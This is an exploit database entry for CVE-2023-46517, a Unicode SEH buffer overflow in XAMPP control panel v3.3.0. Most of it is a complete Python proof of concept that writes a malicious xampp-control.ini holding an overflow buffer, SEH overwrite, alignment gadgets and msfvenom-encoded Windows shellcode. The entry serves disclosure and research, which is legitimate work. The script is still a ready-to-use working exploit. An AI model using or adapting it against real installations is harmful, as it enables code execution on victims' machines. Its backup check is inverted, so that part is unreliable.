XAMPP v3.3.0 '.ini' Buffer Overflow (Unicode + SEH)

vendor:

XAMPP

by:

Talson

6.1

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: XAMPP

Affected Version From: 3.3.2000

Affected Version To: 3.3.2000

Patch Exists: NO

Related CWE: CVE-2023-46517

CPE: a:apache_friends:xampp:3.3.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 11

2023

XAMPP v3.3.0 ‘.ini’ Buffer Overflow (Unicode + SEH)

The exploit involves a buffer overflow vulnerability in XAMPP v3.3.0 that can be triggered by running a specific Python script, resulting in the creation of a malicious 'xampp-control.ini' file. By opening the application and clicking on the 'admin' button in front of the Apache service, an attacker can achieve remote code execution.

Mitigation:

To mitigate this vulnerability, users should ensure they are using the latest version of XAMPP and avoid running untrusted scripts or files.

Source

Exploit-DB raw data:

# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH)
# Date: 2023-10-26
# Author: Talson (@Ripp3rdoc)
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe
# Version: 3.3.0
# Tested on: Windows 11
# CVE-2023-46517

##########################################################
# _________ _______  _        _______  _______  _        #
# \__   __/(  ___  )( \      (  ____ \(  ___  )( (    /| #
#    ) (   | (   ) || (      | (    \/| (   ) ||  \  ( | #
#    | |   | (___) || |      | (_____ | |   | ||   \ | | #
#    | |   |  ___  || |      (_____  )| |   | || (\ \) | #
#    | |   | (   ) || |            ) || |   | || | \   | #
#    | |   | )   ( || (____/\/\____) || (___) || )  \  | #
#    )_(   |/     \|(_______/\_______)(_______)|/    )_) #
#                                                        #
##########################################################

# Proof-of-Concept Steps to Reproduce :

# 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"
# 2.- Open the application (xampp-control.exe)
# 3.- Click on the "admin" button in front of Apache service.
# 4.- Profit

# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/

# Greetingz to EMU TEAM (¬‿¬)⩙

from pwn import *
import shutil
import os.path

buffer      =   "\x41" * 268        # 268 bytes to fill the buffer
nseh        =   "\x59\x71"          # next SEH address  — 0x00590071 (a harmless padding)
seh         =   "\x15\x43"          # SEH handler       — 0x00430015: pop ecx ; pop ebp ; ret ;
padd        =   "\x71" * 0x55       # padding

eax_align =     "\x47" 		    # venetian pad/align
eax_align +=    "\x51"          # push ecx
eax_align +=    "\x71" 		    # venetian pad/align
eax_align +=    "\x58"		    # pop eax               -> eax = 0019e1a0
eax_align +=    "\x71" 		    # venetian pad/align 
eax_align +=    "\x05\x24\x11"  # add eax,0x11002300
eax_align +=    "\x71" 		    # venetian pad/align
eax_align +=    "\x2d\x11\x11"  # sub eax,0x11001100    -> eax = 0019F3DC
eax_align +=    "\x71" 		    # venetian pad/align
eax_align +=    "\x50" 		    # push eax 
eax_align +=    "\x71"		    # pad to align the following ret
eax_align +=    "\xc3";		    # ret into eax?

# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin
# Payload size: 512 bytes
shellcode = (
    "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"
    "AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"
    "Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"
    "myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"
    "JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"
    "KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"
    )

shellcode = buffer + nseh + seh +  eax_align + padd + shellcode


check_file = os.path.isfile("c:\\xampp\\xampp-control.ini")

if check_file:
    
    print("[!] Backup file found. Generating the POC file...")
    pass
else:  
    # create backup
    try:
        shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak")
        print("[+] Creating backup for xampp-control.ini...")
        print("[+] Backup file created!")
    except Exception as e:
        print("[!] Failed creating a backup for xampp-control.ini: ", e)

try:
    
    # Create the new file
    with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file:
        file.write(f"""[Common]
    Edition=
    Editor=
    Browser={shellcode}

    Debug=0
    Debuglevel=0
    Language=en
    TomcatVisible=1
    Minimized=0

    [LogSettings]
    Font=Arial
    FontSize=10

    [WindowSettings]
    Left=-1
    Top=-1
    Width=682
    Height=441

    [Autostart]
    Apache=0
    MySQL=0
    FileZilla=0
    Mercury=0
    Tomcat=0

    [Checks]
    CheckRuntimes=1
    CheckDefaultPorts=1

    [ModuleNames]
    Apache=Apache
    MySQL=MySQL
    Mercury=Mercury
    Tomcat=Tomcat

    [EnableModules]
    Apache=1
    MySQL=1
    FileZilla=1
    Mercury=1
    Tomcat=1

    [EnableServices]
    Apache=1
    MySQL=1
    FileZilla=1
    Tomcat=1

    [BinaryNames]
    Apache=httpd.exe
    MySQL=mysqld.exe
    FileZilla=filezillaserver.exe
    FileZillaAdmin=filezilla server interface.exe
    Mercury=mercury.exe
    Tomcat=tomcat8.exe

    [ServiceNames]
    Apache=Apache2.4
    MySQL=mysql
    FileZilla=FileZillaServer
    Tomcat=Tomcat
    [ServicePorts]
    Apache=80
    ApacheSSL=443
    MySQL=3306
    FileZilla=21
    FileZill=14147
    Mercury1=25
    Mercury2=79
    Mercury3=105
    Mercury4=106
    Mercury5=110
    Mercury6=143
    Mercury7=2224
    TomcatHTTP=8080
    TomcatAJP=8009
    Tomcat=8005
    [UserConfigs]
    Apache= 
    MySQL=
    FileZilla=
    Mercury=
    Tomcat=

    [UserLogs]
    Apache=
    MySQL=
    FileZilla=
    Mercury=
    Tomcat=
    """)
    print("[+] Created the POC!")

except Exception as e:
    print("[!] Failed creating the POC xampp-control.ini: ", e)